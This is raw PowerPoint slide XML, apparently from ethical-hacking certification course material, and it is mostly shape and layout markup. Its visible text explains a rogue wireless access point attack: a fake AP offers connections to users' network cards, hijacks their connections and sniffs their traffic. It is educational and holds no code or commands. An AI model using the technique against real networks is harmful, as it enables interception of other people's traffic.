                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C94763A-C756-4A18-AA12-6E59B5FF1D2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17" y="-2249"/>
                <a:ext cx="322" cy="415"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 322"/>
                  <a:gd name="T1" fmla="*/ 0 h 415"/>
                  <a:gd name="T2" fmla="*/ 0 w 322"/>
                  <a:gd name="T3" fmla="*/ 330 h 415"/>
                  <a:gd name="T4" fmla="*/ 322 w 322"/>
                  <a:gd name="T5" fmla="*/ 415 h 415"/>
                  <a:gd name="T6" fmla="*/ 322 w 322"/>
                  <a:gd name="T7" fmla="*/ 85 h 415"/>
                  <a:gd name="T8" fmla="*/ 0 w 322"/>
                  <a:gd name="T9" fmla="*/ 0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2" h="415">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="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45" name="Freeform 489">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B76101A2-57E1-45CA-8ADC-803FE2BE03A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78" y="-2122"/>
                <a:ext cx="319" cy="416"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 319"/>
                  <a:gd name="T1" fmla="*/ 0 h 416"/>
                  <a:gd name="T2" fmla="*/ 0 w 319"/>
                  <a:gd name="T3" fmla="*/ 331 h 416"/>
                  <a:gd name="T4" fmla="*/ 319 w 319"/>
                  <a:gd name="T5" fmla="*/ 416 h 416"/>
                  <a:gd name="T6" fmla="*/ 319 w 319"/>
                  <a:gd name="T7" fmla="*/ 85 h 416"/>
                  <a:gd name="T8" fmla="*/ 0 w 319"/>
                  <a:gd name="T9" fmla="*/ 0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9" h="416">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="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46" name="Freeform 490">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC52FF2A-68AE-407F-98E8-3920128E7D2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036" y="-1994"/>
                <a:ext cx="319" cy="415"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 319"/>
                  <a:gd name="T1" fmla="*/ 0 h 415"/>
                  <a:gd name="T2" fmla="*/ 0 w 319"/>
                  <a:gd name="T3" fmla="*/ 330 h 415"/>
                  <a:gd name="T4" fmla="*/ 319 w 319"/>
                  <a:gd name="T5" fmla="*/ 415 h 415"/>
                  <a:gd name="T6" fmla="*/ 319 w 319"/>
                  <a:gd name="T7" fmla="*/ 85 h 415"/>
                  <a:gd name="T8" fmla="*/ 0 w 319"/>
                  <a:gd name="T9" fmla="*/ 0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9" h="415">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="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625" name="Line 491">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{081824D7-3410-4040-A1DC-216D124C451A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm flipH="1">
              <a:off x="5801490" y="2716820"/>
              <a:ext cx="792162" cy="215900"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="FF6600"/>
              </a:solidFill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26" name="Line 492">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86229591-DE2B-49D3-825A-28158C8B89EE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm flipH="1">
              <a:off x="5936526" y="2742220"/>
              <a:ext cx="792162" cy="215900"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="2A79D0"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd type="oval" w="sm" len="sm"/>
              <a:tailEnd type="oval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27" name="Group 508">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F6B676E-DAF3-4947-B438-29331E2E9C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8180" y="2427328"/>
              <a:ext cx="355600" cy="187326"/>
              <a:chOff x="2880" y="1638"/>
              <a:chExt cx="224" cy="118"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1638" name="Freeform 509">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA421183-22FD-436A-B854-5A42C9BF777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80" y="1638"/>
                <a:ext cx="224" cy="60"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1810"/>
                  <a:gd name="T1" fmla="*/ 120 h 486"/>
                  <a:gd name="T2" fmla="*/ 451 w 1810"/>
                  <a:gd name="T3" fmla="*/ 0 h 486"/>
                  <a:gd name="T4" fmla="*/ 1810 w 1810"/>
                  <a:gd name="T5" fmla="*/ 363 h 486"/>
                  <a:gd name="T6" fmla="*/ 1358 w 1810"/>
                  <a:gd name="T7" fmla="*/ 486 h 486"/>
                  <a:gd name="T8" fmla="*/ 0 w 1810"/>
                  <a:gd name="T9" fmla="*/ 120 h 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10" h="486">
                    <a:moveTo>
                      <a:pt x="0" y="120"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="451" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1810" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1358" y="486"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="12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39" name="Freeform 510">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C66B6BF-FC59-4F7E-90A7-9895CDB8AD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80" y="1653"/>
                <a:ext cx="168" cy="103"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1358"/>
                  <a:gd name="T1" fmla="*/ 0 h 834"/>
                  <a:gd name="T2" fmla="*/ 0 w 1358"/>
                  <a:gd name="T3" fmla="*/ 470 h 834"/>
                  <a:gd name="T4" fmla="*/ 1358 w 1358"/>
                  <a:gd name="T5" fmla="*/ 834 h 834"/>
                  <a:gd name="T6" fmla="*/ 1358 w 1358"/>
                  <a:gd name="T7" fmla="*/ 366 h 834"/>
                  <a:gd name="T8" fmla="*/ 0 w 1358"/>
                  <a:gd name="T9" fmla="*/ 0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8" h="834">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1358" y="834"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1358" y="36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40" name="Freeform 511">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C543DC58-76B8-4D88-A2F8-9F60F09E44C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048" y="1683"/>
                <a:ext cx="56" cy="73"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 452"/>
                  <a:gd name="T1" fmla="*/ 591 h 591"/>
                  <a:gd name="T2" fmla="*/ 0 w 452"/>
                  <a:gd name="T3" fmla="*/ 123 h 591"/>
                  <a:gd name="T4" fmla="*/ 452 w 452"/>
                  <a:gd name="T5" fmla="*/ 0 h 591"/>
                  <a:gd name="T6" fmla="*/ 452 w 452"/>
                  <a:gd name="T7" fmla="*/ 470 h 591"/>
                  <a:gd name="T8" fmla="*/ 0 w 452"/>
                  <a:gd name="T9" fmla="*/ 591 h 5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2" h="591">
                    <a:moveTo>
                      <a:pt x="0" y="591"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="59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pic>
          <p:nvPicPr>
            <p:cNvPr id="1628" name="Picture 3" descr="Y:\CEH v7 - Haja\Haja Premium Icons\Wireless_Modem.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5594422F-B82D-42E6-87A9-B39DAFF459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68885" y="1997927"/>
              <a:ext cx="396297" cy="39629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629" name="Picture 4" descr="Y:\CEH v7 - Haja\Haja Premium Icons\WiFI.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB652404-B39A-436B-84EF-75AB764196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309742" y="2595481"/>
              <a:ext cx="389354" cy="4329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1630" name="Elbow Connector 516">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5F6D7EC-D3AD-426E-B353-90D891DED58A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="8768644" y="2914192"/>
              <a:ext cx="640080" cy="1097280"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector2">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:headEnd type="arrow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31" name="Picture 1630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A53A6676-3401-4290-8756-1858D06AF94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10285749" y="1772566"/>
              <a:ext cx="344501" cy="283459"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1632" name="Picture 1631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340391B2-1593-4A27-BDA5-72FAF36AB5C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6051875" y="1502524"/>
              <a:ext cx="344501" cy="283459"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1633" name="Picture 1632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50E950B6-421B-41B0-9F2E-1170A1FD806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4922115" y="2333210"/>
              <a:ext cx="344501" cy="283459"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="1634" name="Straight Arrow Connector 1633">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B1FCDCE-A70C-45D4-A604-96D3C4371DC7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="2069" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3124200" y="2913454"/>
              <a:ext cx="1718576" cy="511909"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="FF0000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35" name="Picture 1634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18919152-CBF3-4655-96AD-C1A070C3A95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7945862" y="1488219"/>
              <a:ext cx="344501" cy="283459"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1636" name="Picture 2" descr="F:\Icons\Icons\chat-bubble-38.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{592FA2B6-191D-433D-8012-40BE5B9613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rightnessContrast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9017" y="2393441"/>
              <a:ext cx="1539615" cy="137282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7" name="Rectangle 1636">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1515B5C-6504-4BA4-98F6-5A3BE3195440}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="792060" y="2701363"/>
              <a:ext cx="1240658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My SSID is </a:t>
              </a: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certifiedhacker</a:t>
              </a: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Connect to me</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2090" name="TextBox 2089">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1359BD8B-3101-4C91-B4F0-0AE5A195ACFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1840783" y="137160"/>
            <a:ext cx="8510435" cy="7109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Rogue </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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AP </a:t>
            </a:r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Attack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</a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4238769" y="1021080"/>
            <a:ext cx="3657962" cy="1878557"/>
            <a:chOff x="4520856" y="1157414"/>
            <a:chExt cx="3152598" cy="1619026"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Freeform 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E063896-2CA0-42F2-AB09-1A3932E2C04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601692" y="1238250"/>
              <a:ext cx="2965519" cy="1455046"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 5660"/>
                <a:gd name="T1" fmla="*/ 0 h 2777"/>
                <a:gd name="T2" fmla="*/ 0 w 5660"/>
                <a:gd name="T3" fmla="*/ 0 h 2777"/>
                <a:gd name="T4" fmla="*/ 4271 w 5660"/>
                <a:gd name="T5" fmla="*/ 0 h 2777"/>
                <a:gd name="T6" fmla="*/ 5659 w 5660"/>
                <a:gd name="T7" fmla="*/ 1389 h 2777"/>
                <a:gd name="T8" fmla="*/ 5659 w 5660"/>
                <a:gd name="T9" fmla="*/ 2776 h 2777"/>
                <a:gd name="T10" fmla="*/ 1388 w 5660"/>
                <a:gd name="T11" fmla="*/ 2776 h 2777"/>
                <a:gd name="T12" fmla="*/ 0 w 5660"/>
                <a:gd name="T13" fmla="*/ 1389 h 2777"/>
                <a:gd name="T14" fmla="*/ 0 w 5660"/>
                <a:gd name="T15" fmla="*/ 0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60" h="2777">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4271" y="0"/>
                    <a:pt x="4271" y="0"/>
                    <a:pt x="4271" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5033" y="0"/>
                    <a:pt x="5659" y="627"/>
                    <a:pt x="5659" y="1389"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5659" y="2776"/>
                    <a:pt x="5659" y="2776"/>
                    <a:pt x="5659" y="2776"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1388" y="2776"/>
                    <a:pt x="1388" y="2776"/>
                    <a:pt x="1388" y="2776"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="621" y="2776"/>
                    <a:pt x="0" y="2151"/>
                    <a:pt x="0" y="1389"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0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  <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="914217"/>
              <a:endParaRPr lang="en-US" sz="359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reeform 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B10A7C6-A9ED-4B1B-8704-87FFB89A8F8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520856" y="1157414"/>
              <a:ext cx="843003" cy="845312"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1608"/>
                <a:gd name="T1" fmla="*/ 0 h 1614"/>
                <a:gd name="T2" fmla="*/ 0 w 1608"/>
                <a:gd name="T3" fmla="*/ 0 h 1614"/>
                <a:gd name="T4" fmla="*/ 1607 w 1608"/>
                <a:gd name="T5" fmla="*/ 0 h 1614"/>
                <a:gd name="T6" fmla="*/ 0 w 1608"/>
                <a:gd name="T7" fmla="*/ 1613 h 1614"/>
                <a:gd name="T8" fmla="*/ 0 w 1608"/>
                <a:gd name="T9" fmla="*/ 0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8" h="1614">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1607" y="0"/>
                    <a:pt x="1607" y="0"/>
                    <a:pt x="1607" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1607" y="892"/>
                    <a:pt x="887" y="1613"/>
                    <a:pt x="0" y="1613"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:ln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defTabSz="914217"/>
              <a:endParaRPr lang="en-US" sz="359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reeform 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AB1F648-715A-4F4C-83E2-7A5131B097B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28142" y="1933437"/>
              <a:ext cx="845312" cy="843003"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1613 w 1614"/>
                <a:gd name="T1" fmla="*/ 1607 h 1608"/>
                <a:gd name="T2" fmla="*/ 1613 w 1614"/>
                <a:gd name="T3" fmla="*/ 1607 h 1608"/>
                <a:gd name="T4" fmla="*/ 0 w 1614"/>
                <a:gd name="T5" fmla="*/ 1607 h 1608"/>
                <a:gd name="T6" fmla="*/ 1613 w 1614"/>
                <a:gd name="T7" fmla="*/ 0 h 1608"/>
                <a:gd name="T8" fmla="*/ 1613 w 1614"/>
                <a:gd name="T9" fmla="*/ 1607 h 1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4" h="1608">
                  <a:moveTo>
                    <a:pt x="1613" y="1607"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1613" y="1607"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1607"/>
                    <a:pt x="0" y="1607"/>
                    <a:pt x="0" y="1607"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="715"/>
                    <a:pt x="720" y="0"/>
                    <a:pt x="1613" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1613" y="1607"/>
                  </a:ln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defTabSz="914217"/>
              <a:endParaRPr lang="en-US" sz="3599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70AA85FB-0E3A-4AA8-973F-C919BE233D18}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4653819" y="1238250"/>
              <a:ext cx="405881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217"/>
              <a:r>
                <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Lato" charset="0"/>
                  <a:ea typeface="Lato" charset="0"/>
                  <a:cs typeface="Lato" charset="0"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2092" name="Freeform 61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2184C57-4B11-4268-B273-DDD04E50FDC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172325" y="2313692"/>
              <a:ext cx="279336" cy="253942"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 178824 w 602"/>
                <a:gd name="T1" fmla="*/ 217126 h 602"/>
                <a:gd name="T2" fmla="*/ 178824 w 602"/>
                <a:gd name="T3" fmla="*/ 217126 h 602"/>
                <a:gd name="T4" fmla="*/ 0 w 602"/>
                <a:gd name="T5" fmla="*/ 35766 h 602"/>
                <a:gd name="T6" fmla="*/ 0 w 602"/>
                <a:gd name="T7" fmla="*/ 0 h 602"/>
                <a:gd name="T8" fmla="*/ 217118 w 602"/>
                <a:gd name="T9" fmla="*/ 217126 h 602"/>
                <a:gd name="T10" fmla="*/ 178824 w 602"/>
                <a:gd name="T11" fmla="*/ 217126 h 602"/>
                <a:gd name="T12" fmla="*/ 138002 w 602"/>
                <a:gd name="T13" fmla="*/ 217126 h 602"/>
                <a:gd name="T14" fmla="*/ 138002 w 602"/>
                <a:gd name="T15" fmla="*/ 217126 h 602"/>
                <a:gd name="T16" fmla="*/ 102237 w 602"/>
                <a:gd name="T17" fmla="*/ 217126 h 602"/>
                <a:gd name="T18" fmla="*/ 0 w 602"/>
                <a:gd name="T19" fmla="*/ 114885 h 602"/>
                <a:gd name="T20" fmla="*/ 0 w 602"/>
                <a:gd name="T21" fmla="*/ 76590 h 602"/>
                <a:gd name="T22" fmla="*/ 138002 w 602"/>
                <a:gd name="T23" fmla="*/ 217126 h 602"/>
                <a:gd name="T24" fmla="*/ 25650 w 602"/>
                <a:gd name="T25" fmla="*/ 163657 h 602"/>
                <a:gd name="T26" fmla="*/ 25650 w 602"/>
                <a:gd name="T27" fmla="*/ 163657 h 602"/>
                <a:gd name="T28" fmla="*/ 53467 w 602"/>
                <a:gd name="T29" fmla="*/ 188946 h 602"/>
                <a:gd name="T30" fmla="*/ 25650 w 602"/>
                <a:gd name="T31" fmla="*/ 217126 h 602"/>
                <a:gd name="T32" fmla="*/ 0 w 602"/>
                <a:gd name="T33" fmla="*/ 188946 h 602"/>
                <a:gd name="T34" fmla="*/ 25650 w 602"/>
                <a:gd name="T35" fmla="*/ 163657 h 60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02" h="602">
                  <a:moveTo>
                    <a:pt x="495" y="601"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="495" y="601"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="495" y="325"/>
                    <a:pt x="276" y="99"/>
                    <a:pt x="0" y="9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32" y="0"/>
                    <a:pt x="601" y="269"/>
                    <a:pt x="601" y="601"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="495" y="601"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="382" y="601"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="382" y="601"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="283" y="601"/>
                    <a:pt x="283" y="601"/>
                    <a:pt x="283" y="601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="283" y="446"/>
                    <a:pt x="155" y="318"/>
                    <a:pt x="0" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="212"/>
                    <a:pt x="0" y="212"/>
                    <a:pt x="0" y="212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="212"/>
                    <a:pt x="382" y="389"/>
                    <a:pt x="382" y="601"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="71" y="453"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="71" y="453"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="453"/>
                    <a:pt x="148" y="481"/>
                    <a:pt x="148" y="523"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="566"/>
                    <a:pt x="113" y="601"/>
                    <a:pt x="71" y="601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="601"/>
                    <a:pt x="0" y="566"/>
                    <a:pt x="0" y="523"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="481"/>
                    <a:pt x="28" y="453"/>
                    <a:pt x="71" y="45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534" name="Rectangle 533">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{079E9697-A515-411F-89FC-34DEA8463A5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="1157407"/>
            <a:ext cx="2398970" cy="16619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rogue wireless AP placed into an 802.11 network can be used to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hijack the connections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of legitimate </a:t>
            </a:r>
            <a:b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</a:b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network users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="535" name="Rectangle 534">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A34A6564-2C04-4E2A-B055-A799B5A92453}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9041240" y="1157407"/>
            <a:ext cx="2647840" cy="140038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All the traffic the user enters will pass through the rogue AP, thus enabling a form of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wireless </a:t>
            </a:r>
            <a:b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</a:b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packet sniffing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="536" name="Rectangle 535">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{407712C4-8FCB-42F4-95FF-063937D63B19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5152679" y="1157407"/>
            <a:ext cx="2433053" cy="140038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When the user turns on the computer, the rogue wireless AP will offer to connect with the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network user’s NIC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
